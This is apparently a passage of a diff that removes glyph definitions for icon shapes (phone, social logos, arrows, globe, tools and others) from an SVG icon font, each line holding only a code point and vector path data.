-<glyph unicode="&#xf094;" d="M1407 710q0 44 -7 113.5t-18 96.5q-12 30 -17 44t-9 36.5t-4 48.5q0 23 5 68.5t5 67.5q0 37 -10 55q-4 1 -13 1q-19 0 -58 -4.5t-59 -4.5q-60 0 -176 24t-175 24q-43 0 -94.5 -11.5t-85 -23.5t-89.5 -34q-137 -54 -202 -103q-96 -73 -159.5 -189.5t-88 -236t-24.5 -248.5 q0 -40 12.5 -120t12.5 -121q0 -23 -11 -66.5t-11 -65.5t12 -36.5t34 -14.5q24 0 72.5 11t73.5 11q57 0 169.5 -15.5t169.5 -15.5q181 0 284 36q129 45 235.5 152.5t166 245.5t59.5 275zM1535 712q0 -165 -70 -327.5t-196 -288t-281 -180.5q-124 -44 -326 -44 q-57 0 -170 14.5t-169 14.5q-24 0 -72.5 -14.5t-73.5 -14.5q-73 0 -123.5 55.5t-50.5 128.5q0 24 11 68t11 67q0 40 -12.5 120.5t-12.5 121.5q0 111 18 217.5t54.5 209.5t100.5 194t150 156q78 59 232 120q194 78 316 78q60 0 175.5 -24t173.5 -24q19 0 57 5t58 5 q81 0 118 -50.5t37 -134.5q0 -23 -5 -68t-5 -68q0 -10 1 -18.5t3 -17t4 -13.5t6.5 -16t6.5 -17q16 -40 25 -118.5t9 -136.5z" />
-<glyph unicode="&#xf095;" horiz-adv-x="1408" d="M1408 296q0 -27 -10 -70.5t-21 -68.5q-21 -50 -122 -106q-94 -51 -186 -51q-27 0 -52.5 3.5t-57.5 12.5t-47.5 14.5t-55.5 20.5t-49 18q-98 35 -175 83q-128 79 -264.5 215.5t-215.5 264.5q-48 77 -83 175q-3 9 -18 49t-20.5 55.5t-14.5 47.5t-12.5 57.5t-3.5 52.5 q0 92 51 186q56 101 106 122q25 11 68.5 21t70.5 10q14 0 21 -3q18 -6 53 -76q11 -19 30 -54t35 -63.5t31 -53.5q3 -4 17.5 -25t21.5 -35.5t7 -28.5q0 -20 -28.5 -50t-62 -55t-62 -53t-28.5 -46q0 -9 5 -22.5t8.5 -20.5t14 -24t11.5 -19q76 -137 174 -235t235 -174 q2 -1 19 -11.5t24 -14t20.5 -8.5t22.5 -5q18 0 46 28.5t53 62t55 62t50 28.5q14 0 28.5 -7t35.5 -21.5t25 -17.5q25 -15 53.5 -31t63.5 -35t54 -30q70 -35 76 -53q3 -7 3 -21z" />
-<glyph unicode="&#xf096;" horiz-adv-x="1408" d="M1120 1280h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v832q0 66 -47 113t-113 47zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832 q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf097;" horiz-adv-x="1280" d="M1152 1280h-1024v-1242l423 406l89 85l89 -85l423 -406v1242zM1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289 q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
-<glyph unicode="&#xf098;" d="M1280 343q0 11 -2 16q-3 8 -38.5 29.5t-88.5 49.5l-53 29q-5 3 -19 13t-25 15t-21 5q-18 0 -47 -32.5t-57 -65.5t-44 -33q-7 0 -16.5 3.5t-15.5 6.5t-17 9.5t-14 8.5q-99 55 -170.5 126.5t-126.5 170.5q-2 3 -8.5 14t-9.5 17t-6.5 15.5t-3.5 16.5q0 13 20.5 33.5t45 38.5 t45 39.5t20.5 36.5q0 10 -5 21t-15 25t-13 19q-3 6 -15 28.5t-25 45.5t-26.5 47.5t-25 40.5t-16.5 18t-16 2q-48 0 -101 -22q-46 -21 -80 -94.5t-34 -130.5q0 -16 2.5 -34t5 -30.5t9 -33t10 -29.5t12.5 -33t11 -30q60 -164 216.5 -320.5t320.5 -216.5q6 -2 30 -11t33 -12.5 t29.5 -10t33 -9t30.5 -5t34 -2.5q57 0 130.5 34t94.5 80q22 53 22 101zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf099;" horiz-adv-x="1664" d="M1620 1128q-67 -98 -162 -167q1 -14 1 -42q0 -130 -38 -259.5t-115.5 -248.5t-184.5 -210.5t-258 -146t-323 -54.5q-271 0 -496 145q35 -4 78 -4q225 0 401 138q-105 2 -188 64.5t-114 159.5q33 -5 61 -5q43 0 85 11q-112 23 -185.5 111.5t-73.5 205.5v4q68 -38 146 -41 q-66 44 -105 115t-39 154q0 88 44 163q121 -149 294.5 -238.5t371.5 -99.5q-8 38 -8 74q0 134 94.5 228.5t228.5 94.5q140 0 236 -102q109 21 205 78q-37 -115 -142 -178q93 10 186 50z" />
-<glyph unicode="&#xf09a;" horiz-adv-x="768" d="M511 980h257l-30 -284h-227v-824h-341v824h-170v284h170v171q0 182 86 275.5t283 93.5h227v-284h-142q-39 0 -62.5 -6.5t-34 -23.5t-13.5 -34.5t-3 -49.5v-142z" />
-<glyph unicode="&#xf09b;" d="M1536 640q0 -251 -146.5 -451.5t-378.5 -277.5q-27 -5 -39.5 7t-12.5 30v211q0 97 -52 142q57 6 102.5 18t94 39t81 66.5t53 105t20.5 150.5q0 121 -79 206q37 91 -8 204q-28 9 -81 -11t-92 -44l-38 -24q-93 26 -192 26t-192 -26q-16 11 -42.5 27t-83.5 38.5t-86 13.5 q-44 -113 -7 -204q-79 -85 -79 -206q0 -85 20.5 -150t52.5 -105t80.5 -67t94 -39t102.5 -18q-40 -36 -49 -103q-21 -10 -45 -15t-57 -5t-65.5 21.5t-55.5 62.5q-19 32 -48.5 52t-49.5 24l-20 3q-21 0 -29 -4.5t-5 -11.5t9 -14t13 -12l7 -5q22 -10 43.5 -38t31.5 -51l10 -23 q13 -38 44 -61.5t67 -30t69.5 -7t55.5 3.5l23 4q0 -38 0.5 -89t0.5 -54q0 -18 -13 -30t-40 -7q-232 77 -378.5 277.5t-146.5 451.5q0 209 103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf09c;" horiz-adv-x="1664" d="M1664 960v-256q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45v256q0 106 -75 181t-181 75t-181 -75t-75 -181v-192h96q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h672v192q0 185 131.5 316.5t316.5 131.5 t316.5 -131.5t131.5 -316.5z" />
-<glyph unicode="&#xf09d;" horiz-adv-x="1920" d="M1760 1408q66 0 113 -47t47 -113v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600zM160 1280q-13 0 -22.5 -9.5t-9.5 -22.5v-224h1664v224q0 13 -9.5 22.5t-22.5 9.5h-1600zM1760 0q13 0 22.5 9.5t9.5 22.5v608h-1664v-608 q0 -13 9.5 -22.5t22.5 -9.5h1600zM256 128v128h256v-128h-256zM640 128v128h384v-128h-384z" />
-<glyph unicode="&#xf09e;" horiz-adv-x="1408" d="M384 192q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM896 69q2 -28 -17 -48q-18 -21 -47 -21h-135q-25 0 -43 16.5t-20 41.5q-22 229 -184.5 391.5t-391.5 184.5q-25 2 -41.5 20t-16.5 43v135q0 29 21 47q17 17 43 17h5q160 -13 306 -80.5 t259 -181.5q114 -113 181.5 -259t80.5 -306zM1408 67q2 -27 -18 -47q-18 -20 -46 -20h-143q-26 0 -44.5 17.5t-19.5 42.5q-12 215 -101 408.5t-231.5 336t-336 231.5t-408.5 102q-25 1 -42.5 19.5t-17.5 43.5v143q0 28 20 46q18 18 44 18h3q262 -13 501.5 -120t425.5 -294 q187 -186 294 -425.5t120 -501.5z" />
-<glyph unicode="&#xf0a0;" d="M1040 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1296 320q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5zM1408 160v320q0 13 -9.5 22.5t-22.5 9.5 h-1216q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h1216q13 0 22.5 9.5t9.5 22.5zM178 640h1180l-157 482q-4 13 -16 21.5t-26 8.5h-782q-14 0 -26 -8.5t-16 -21.5zM1536 480v-320q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113v320q0 25 16 75 l197 606q17 53 63 86t101 33h782q55 0 101 -33t63 -86l197 -606q16 -50 16 -75z" />
-<glyph unicode="&#xf0a1;" horiz-adv-x="1792" d="M1664 896q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5v-384q0 -52 -38 -90t-90 -38q-417 347 -812 380q-58 -19 -91 -66t-31 -100.5t40 -92.5q-20 -33 -23 -65.5t6 -58t33.5 -55t48 -50t61.5 -50.5q-29 -58 -111.5 -83t-168.5 -11.5t-132 55.5q-7 23 -29.5 87.5 t-32 94.5t-23 89t-15 101t3.5 98.5t22 110.5h-122q-66 0 -113 47t-47 113v192q0 66 47 113t113 47h480q435 0 896 384q52 0 90 -38t38 -90v-384zM1536 292v954q-394 -302 -768 -343v-270q377 -42 768 -341z" />
-<glyph unicode="&#xf0a2;" horiz-adv-x="1664" d="M848 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM183 128h1298q-164 181 -246.5 411.5t-82.5 484.5q0 256 -320 256t-320 -256q0 -254 -82.5 -484.5t-246.5 -411.5zM1664 128q0 -52 -38 -90t-90 -38 h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q190 161 287 397.5t97 498.5q0 165 96 262t264 117q-8 18 -8 37q0 40 28 68t68 28t68 -28t28 -68q0 -19 -8 -37q168 -20 264 -117t96 -262q0 -262 97 -498.5t287 -397.5z" />
-<glyph unicode="&#xf0a3;" d="M1376 640l138 -135q30 -28 20 -70q-12 -41 -52 -51l-188 -48l53 -186q12 -41 -19 -70q-29 -31 -70 -19l-186 53l-48 -188q-10 -40 -51 -52q-12 -2 -19 -2q-31 0 -51 22l-135 138l-135 -138q-28 -30 -70 -20q-41 11 -51 52l-48 188l-186 -53q-41 -12 -70 19q-31 29 -19 70 l53 186l-188 48q-40 10 -52 51q-10 42 20 70l138 135l-138 135q-30 28 -20 70q12 41 52 51l188 48l-53 186q-12 41 19 70q29 31 70 19l186 -53l48 188q10 41 51 51q41 12 70 -19l135 -139l135 139q29 30 70 19q41 -10 51 -51l48 -188l186 53q41 12 70 -19q31 -29 19 -70 l-53 -186l188 -48q40 -10 52 -51q10 -42 -20 -70z" />
-<glyph unicode="&#xf0a4;" horiz-adv-x="1792" d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 768q0 51 -39 89.5t-89 38.5h-576q0 20 15 48.5t33 55t33 68t15 84.5q0 67 -44.5 97.5t-115.5 30.5q-24 0 -90 -139q-24 -44 -37 -65q-40 -64 -112 -145q-71 -81 -101 -106 q-69 -57 -140 -57h-32v-640h32q72 0 167 -32t193.5 -64t179.5 -32q189 0 189 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5h331q52 0 90 38t38 90zM1792 769q0 -105 -75.5 -181t-180.5 -76h-169q-4 -62 -37 -119q3 -21 3 -43 q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5q-133 0 -322 69q-164 59 -223 59h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h288q10 0 21.5 4.5t23.5 14t22.5 18t24 22.5t20.5 21.5t19 21.5t14 17q65 74 100 129q13 21 33 62t37 72t40.5 63t55 49.5 t69.5 17.5q125 0 206.5 -67t81.5 -189q0 -68 -22 -128h374q104 0 180 -76t76 -179z" />
-<glyph unicode="&#xf0a5;" horiz-adv-x="1792" d="M1376 128h32v640h-32q-35 0 -67.5 12t-62.5 37t-50 46t-49 54q-2 3 -3.5 4.5t-4 4.5t-4.5 5q-72 81 -112 145q-14 22 -38 68q-1 3 -10.5 22.5t-18.5 36t-20 35.5t-21.5 30.5t-18.5 11.5q-71 0 -115.5 -30.5t-44.5 -97.5q0 -43 15 -84.5t33 -68t33 -55t15 -48.5h-576 q-50 0 -89 -38.5t-39 -89.5q0 -52 38 -90t90 -38h331q-15 -17 -25 -47.5t-10 -55.5q0 -69 53 -119q-18 -32 -18 -69t17.5 -73.5t47.5 -52.5q-4 -24 -4 -56q0 -85 48.5 -126t135.5 -41q84 0 183 32t194 64t167 32zM1664 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45 t45 -19t45 19t19 45zM1792 768v-640q0 -53 -37.5 -90.5t-90.5 -37.5h-288q-59 0 -223 -59q-190 -69 -317 -69q-142 0 -230 77.5t-87 217.5l1 5q-61 76 -61 178q0 22 3 43q-33 57 -37 119h-169q-105 0 -180.5 76t-75.5 181q0 103 76 179t180 76h374q-22 60 -22 128 q0 122 81.5 189t206.5 67q38 0 69.5 -17.5t55 -49.5t40.5 -63t37 -72t33 -62q35 -55 100 -129q2 -3 14 -17t19 -21.5t20.5 -21.5t24 -22.5t22.5 -18t23.5 -14t21.5 -4.5h288q53 0 90.5 -37.5t37.5 -90.5z" />
-<glyph unicode="&#xf0a6;" d="M1280 -64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 700q0 189 -167 189q-26 0 -56 -5q-16 30 -52.5 47.5t-73.5 17.5t-69 -18q-50 53 -119 53q-25 0 -55.5 -10t-47.5 -25v331q0 52 -38 90t-90 38q-51 0 -89.5 -39t-38.5 -89v-576 q-20 0 -48.5 15t-55 33t-68 33t-84.5 15q-67 0 -97.5 -44.5t-30.5 -115.5q0 -24 139 -90q44 -24 65 -37q64 -40 145 -112q81 -71 106 -101q57 -69 57 -140v-32h640v32q0 72 32 167t64 193.5t32 179.5zM1536 705q0 -133 -69 -322q-59 -164 -59 -223v-288q0 -53 -37.5 -90.5 t-90.5 -37.5h-640q-53 0 -90.5 37.5t-37.5 90.5v288q0 10 -4.5 21.5t-14 23.5t-18 22.5t-22.5 24t-21.5 20.5t-21.5 19t-17 14q-74 65 -129 100q-21 13 -62 33t-72 37t-63 40.5t-49.5 55t-17.5 69.5q0 125 67 206.5t189 81.5q68 0 128 -22v374q0 104 76 180t179 76 q105 0 181 -75.5t76 -180.5v-169q62 -4 119 -37q21 3 43 3q101 0 178 -60q139 1 219.5 -85t80.5 -227z" />
-<glyph unicode="&#xf0a7;" d="M1408 576q0 84 -32 183t-64 194t-32 167v32h-640v-32q0 -35 -12 -67.5t-37 -62.5t-46 -50t-54 -49q-9 -8 -14 -12q-81 -72 -145 -112q-22 -14 -68 -38q-3 -1 -22.5 -10.5t-36 -18.5t-35.5 -20t-30.5 -21.5t-11.5 -18.5q0 -71 30.5 -115.5t97.5 -44.5q43 0 84.5 15t68 33 t55 33t48.5 15v-576q0 -50 38.5 -89t89.5 -39q52 0 90 38t38 90v331q46 -35 103 -35q69 0 119 53q32 -18 69 -18t73.5 17.5t52.5 47.5q24 -4 56 -4q85 0 126 48.5t41 135.5zM1280 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 580 q0 -142 -77.5 -230t-217.5 -87l-5 1q-76 -61 -178 -61q-22 0 -43 3q-54 -30 -119 -37v-169q0 -105 -76 -180.5t-181 -75.5q-103 0 -179 76t-76 180v374q-54 -22 -128 -22q-121 0 -188.5 81.5t-67.5 206.5q0 38 17.5 69.5t49.5 55t63 40.5t72 37t62 33q55 35 129 100 q3 2 17 14t21.5 19t21.5 20.5t22.5 24t18 22.5t14 23.5t4.5 21.5v288q0 53 37.5 90.5t90.5 37.5h640q53 0 90.5 -37.5t37.5 -90.5v-288q0 -59 59 -223q69 -190 69 -317z" />
-<glyph unicode="&#xf0a8;" d="M1280 576v128q0 26 -19 45t-45 19h-502l189 189q19 19 19 45t-19 45l-91 91q-18 18 -45 18t-45 -18l-362 -362l-91 -91q-18 -18 -18 -45t18 -45l91 -91l362 -362q18 -18 45 -18t45 18l91 91q18 18 18 45t-18 45l-189 189h502q26 0 45 19t19 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf0a9;" d="M1285 640q0 27 -18 45l-91 91l-362 362q-18 18 -45 18t-45 -18l-91 -91q-18 -18 -18 -45t18 -45l189 -189h-502q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h502l-189 -189q-19 -19 -19 -45t19 -45l91 -91q18 -18 45 -18t45 18l362 362l91 91q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf0aa;" d="M1284 641q0 27 -18 45l-362 362l-91 91q-18 18 -45 18t-45 -18l-91 -91l-362 -362q-18 -18 -18 -45t18 -45l91 -91q18 -18 45 -18t45 18l189 189v-502q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v502l189 -189q19 -19 45 -19t45 19l91 91q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf0ab;" d="M1284 639q0 27 -18 45l-91 91q-18 18 -45 18t-45 -18l-189 -189v502q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-502l-189 189q-19 19 -45 19t-45 -19l-91 -91q-18 -18 -18 -45t18 -45l362 -362l91 -91q18 -18 45 -18t45 18l91 91l362 362q18 18 18 45zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf0ac;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1042 887q-2 -1 -9.5 -9.5t-13.5 -9.5q2 0 4.5 5t5 11t3.5 7q6 7 22 15q14 6 52 12q34 8 51 -11 q-2 2 9.5 13t14.5 12q3 2 15 4.5t15 7.5l2 22q-12 -1 -17.5 7t-6.5 21q0 -2 -6 -8q0 7 -4.5 8t-11.5 -1t-9 -1q-10 3 -15 7.5t-8 16.5t-4 15q-2 5 -9.5 10.5t-9.5 10.5q-1 2 -2.5 5.5t-3 6.5t-4 5.5t-5.5 2.5t-7 -5t-7.5 -10t-4.5 -5q-3 2 -6 1.5t-4.5 -1t-4.5 -3t-5 -3.5 q-3 -2 -8.5 -3t-8.5 -2q15 5 -1 11q-10 4 -16 3q9 4 7.5 12t-8.5 14h5q-1 4 -8.5 8.5t-17.5 8.5t-13 6q-8 5 -34 9.5t-33 0.5q-5 -6 -4.5 -10.5t4 -14t3.5 -12.5q1 -6 -5.5 -13t-6.5 -12q0 -7 14 -15.5t10 -21.5q-3 -8 -16 -16t-16 -12q-5 -8 -1.5 -18.5t10.5 -16.5 q2 -2 1.5 -4t-3.5 -4.5t-5.5 -4t-6.5 -3.5l-3 -2q-11 -5 -20.5 6t-13.5 26q-7 25 -16 30q-23 8 -29 -1q-5 13 -41 26q-25 9 -58 4q6 1 0 15q-7 15 -19 12q3 6 4 17.5t1 13.5q3 13 12 23q1 1 7 8.5t9.5 13.5t0.5 6q35 -4 50 11q5 5 11.5 17t10.5 17q9 6 14 5.5t14.5 -5.5 t14.5 -5q14 -1 15.5 11t-7.5 20q12 -1 3 17q-5 7 -8 9q-12 4 -27 -5q-8 -4 2 -8q-1 1 -9.5 -10.5t-16.5 -17.5t-16 5q-1 1 -5.5 13.5t-9.5 13.5q-8 0 -16 -15q3 8 -11 15t-24 8q19 12 -8 27q-7 4 -20.5 5t-19.5 -4q-5 -7 -5.5 -11.5t5 -8t10.5 -5.5t11.5 -4t8.5 -3 q14 -10 8 -14q-2 -1 -8.5 -3.5t-11.5 -4.5t-6 -4q-3 -4 0 -14t-2 -14q-5 5 -9 17.5t-7 16.5q7 -9 -25 -6l-10 1q-4 0 -16 -2t-20.5 -1t-13.5 8q-4 8 0 20q1 4 4 2q-4 3 -11 9.5t-10 8.5q-46 -15 -94 -41q6 -1 12 1q5 2 13 6.5t10 5.5q34 14 42 7l5 5q14 -16 20 -25 q-7 4 -30 1q-20 -6 -22 -12q7 -12 5 -18q-4 3 -11.5 10t-14.5 11t-15 5q-16 0 -22 -1q-146 -80 -235 -222q7 -7 12 -8q4 -1 5 -9t2.5 -11t11.5 3q9 -8 3 -19q1 1 44 -27q19 -17 21 -21q3 -11 -10 -18q-1 2 -9 9t-9 4q-3 -5 0.5 -18.5t10.5 -12.5q-7 0 -9.5 -16t-2.5 -35.5 t-1 -23.5l2 -1q-3 -12 5.5 -34.5t21.5 -19.5q-13 -3 20 -43q6 -8 8 -9q3 -2 12 -7.5t15 -10t10 -10.5q4 -5 10 -22.5t14 -23.5q-2 -6 9.5 -20t10.5 -23q-1 0 -2.5 -1t-2.5 -1q3 -7 15.5 -14t15.5 -13q1 -3 2 -10t3 -11t8 -2q2 20 -24 62q-15 25 -17 29q-3 5 -5.5 15.5 t-4.5 14.5q2 0 6 -1.5t8.5 -3.5t7.5 -4t2 -3q-3 -7 2 -17.5t12 -18.5t17 -19t12 -13q6 -6 14 -19.5t0 -13.5q9 0 20 -10t17 -20q5 -8 8 -26t5 -24q2 -7 8.5 -13.5t12.5 -9.5l16 -8t13 -7q5 -2 18.5 -10.5t21.5 -11.5q10 -4 16 -4t14.5 2.5t13.5 3.5q15 2 29 -15t21 -21 q36 -19 55 -11q-2 -1 0.5 -7.5t8 -15.5t9 -14.5t5.5 -8.5q5 -6 18 -15t18 -15q6 4 7 9q-3 -8 7 -20t18 -10q14 3 14 32q-31 -15 -49 18q0 1 -2.5 5.5t-4 8.5t-2.5 8.5t0 7.5t5 3q9 0 10 3.5t-2 12.5t-4 13q-1 8 -11 20t-12 15q-5 -9 -16 -8t-16 9q0 -1 -1.5 -5.5t-1.5 -6.5 q-13 0 -15 1q1 3 2.5 17.5t3.5 22.5q1 4 5.5 12t7.5 14.5t4 12.5t-4.5 9.5t-17.5 2.5q-19 -1 -26 -20q-1 -3 -3 -10.5t-5 -11.5t-9 -7q-7 -3 -24 -2t-24 5q-13 8 -22.5 29t-9.5 37q0 10 2.5 26.5t3 25t-5.5 24.5q3 2 9 9.5t10 10.5q2 1 4.5 1.5t4.5 0t4 1.5t3 6q-1 1 -4 3 q-3 3 -4 3q7 -3 28.5 1.5t27.5 -1.5q15 -11 22 2q0 1 -2.5 9.5t-0.5 13.5q5 -27 29 -9q3 -3 15.5 -5t17.5 -5q3 -2 7 -5.5t5.5 -4.5t5 0.5t8.5 6.5q10 -14 12 -24q11 -40 19 -44q7 -3 11 -2t4.5 9.5t0 14t-1.5 12.5l-1 8v18l-1 8q-15 3 -18.5 12t1.5 18.5t15 18.5q1 1 8 3.5 t15.5 6.5t12.5 8q21 19 15 35q7 0 11 9q-1 0 -5 3t-7.5 5t-4.5 2q9 5 2 16q5 3 7.5 11t7.5 10q9 -12 21 -2q7 8 1 16q5 7 20.5 10.5t18.5 9.5q7 -2 8 2t1 12t3 12q4 5 15 9t13 5l17 11q3 4 0 4q18 -2 31 11q10 11 -6 20q3 6 -3 9.5t-15 5.5q3 1 11.5 0.5t10.5 1.5 q15 10 -7 16q-17 5 -43 -12zM879 10q206 36 351 189q-3 3 -12.5 4.5t-12.5 3.5q-18 7 -24 8q1 7 -2.5 13t-8 9t-12.5 8t-11 7q-2 2 -7 6t-7 5.5t-7.5 4.5t-8.5 2t-10 -1l-3 -1q-3 -1 -5.5 -2.5t-5.5 -3t-4 -3t0 -2.5q-21 17 -36 22q-5 1 -11 5.5t-10.5 7t-10 1.5t-11.5 -7 q-5 -5 -6 -15t-2 -13q-7 5 0 17.5t2 18.5q-3 6 -10.5 4.5t-12 -4.5t-11.5 -8.5t-9 -6.5t-8.5 -5.5t-8.5 -7.5q-3 -4 -6 -12t-5 -11q-2 4 -11.5 6.5t-9.5 5.5q2 -10 4 -35t5 -38q7 -31 -12 -48q-27 -25 -29 -40q-4 -22 12 -26q0 -7 -8 -20.5t-7 -21.5q0 -6 2 -16z" />
-<glyph unicode="&#xf0ad;" horiz-adv-x="1664" d="M384 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1028 484l-682 -682q-37 -37 -90 -37q-52 0 -91 37l-106 108q-38 36 -38 90q0 53 38 91l681 681q39 -98 114.5 -173.5t173.5 -114.5zM1662 919q0 -39 -23 -106q-47 -134 -164.5 -217.5 t-258.5 -83.5q-185 0 -316.5 131.5t-131.5 316.5t131.5 316.5t316.5 131.5q58 0 121.5 -16.5t107.5 -46.5q16 -11 16 -28t-16 -28l-293 -169v-224l193 -107q5 3 79 48.5t135.5 81t70.5 35.5q15 0 23.5 -10t8.5 -25z" />
-<glyph unicode="&#xf0ae;" horiz-adv-x="1792" d="M1024 128h640v128h-640v-128zM640 640h1024v128h-1024v-128zM1280 1152h384v128h-384v-128zM1792 320v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 832v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19 t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0b0;" horiz-adv-x="1408" d="M1403 1241q17 -41 -14 -70l-493 -493v-742q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-256 256q-19 19 -19 45v486l-493 493q-31 29 -14 70q17 39 59 39h1280q42 0 59 -39z" />
-<glyph unicode="&#xf0b1;" horiz-adv-x="1792" d="M640 1280h512v128h-512v-128zM1792 640v-480q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v480h672v-160q0 -26 19 -45t45 -19h320q26 0 45 19t19 45v160h672zM1024 640v-128h-256v128h256zM1792 1120v-384h-1792v384q0 66 47 113t113 47h352v160q0 40 28 68 t68 28h576q40 0 68 -28t28 -68v-160h352q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf0b2;" d="M1283 995l-355 -355l355 -355l144 144q29 31 70 14q39 -17 39 -59v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l144 144l-355 355l-355 -355l144 -144q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l144 -144 l355 355l-355 355l-144 -144q-19 -19 -45 -19q-12 0 -24 5q-40 17 -40 59v448q0 26 19 45t45 19h448q42 0 59 -40q17 -39 -14 -69l-144 -144l355 -355l355 355l-144 144q-31 30 -14 69q17 40 59 40h448q26 0 45 -19t19 -45v-448q0 -42 -39 -59q-13 -5 -25 -5q-26 0 -45 19z " />
-<glyph unicode="&#xf0c0;" horiz-adv-x="1920" d="M593 640q-162 -5 -265 -128h-134q-82 0 -138 40.5t-56 118.5q0 353 124 353q6 0 43.5 -21t97.5 -42.5t119 -21.5q67 0 133 23q-5 -37 -5 -66q0 -139 81 -256zM1664 3q0 -120 -73 -189.5t-194 -69.5h-874q-121 0 -194 69.5t-73 189.5q0 53 3.5 103.5t14 109t26.5 108.5 t43 97.5t62 81t85.5 53.5t111.5 20q10 0 43 -21.5t73 -48t107 -48t135 -21.5t135 21.5t107 48t73 48t43 21.5q61 0 111.5 -20t85.5 -53.5t62 -81t43 -97.5t26.5 -108.5t14 -109t3.5 -103.5zM640 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75 t75 -181zM1344 896q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5zM1920 671q0 -78 -56 -118.5t-138 -40.5h-134q-103 123 -265 128q81 117 81 256q0 29 -5 66q66 -23 133 -23q59 0 119 21.5t97.5 42.5 t43.5 21q124 0 124 -353zM1792 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181z" />
